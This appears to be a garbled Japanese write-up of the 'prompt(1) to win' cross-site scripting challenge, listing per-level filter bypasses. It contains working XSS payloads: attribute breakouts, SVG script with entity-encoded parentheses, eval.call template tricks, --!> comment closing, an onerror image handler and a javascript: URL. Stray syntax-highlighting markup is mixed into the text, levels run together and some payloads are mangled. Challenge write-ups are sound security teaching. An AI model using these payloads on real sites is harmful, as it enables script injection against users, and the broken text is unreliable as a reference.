prompt(1) to win writeup

0

フィルタなし

">prompt(1)または">

1

大きい番号をフィルタしました>、コメント//で迂回します

aa

2

左かっこ(ラベルを使用して迂回します。SVGベクトルの</code>要素(または他のCDATA要素)は、xml解析を先に行います。従って<code>(</code>(16進)または<code>(</code>(10進)または<code>&amp;lpar;</code>(htmlエンティティ符号化)は、(.</h 3><code><svg><script>prompt&amp;#40;1)またはprompt(1)またはevalに還元する.call<span class="hljs-smartquote">`${'</span>prompt\x281)<span class="hljs-emphasis">'}` または eval.call&lt;span class="hljs-smartquote"&gt;`${'&lt;/span&gt;promptx 281)&lt;span class="hljs-emphasis"&gt;'}`3フィルタ-->,利用可能--!>代わりにa-!>prompt(1)または--!>4 5 onxxxをフィルタし、フィルタしました>、車に戻る記号でonxxxを迂回してaa"type=image src=x onerror="prompt(1)6ソースjavascript:prompt(1)#{"action":1}7使用"と=payloadを構築">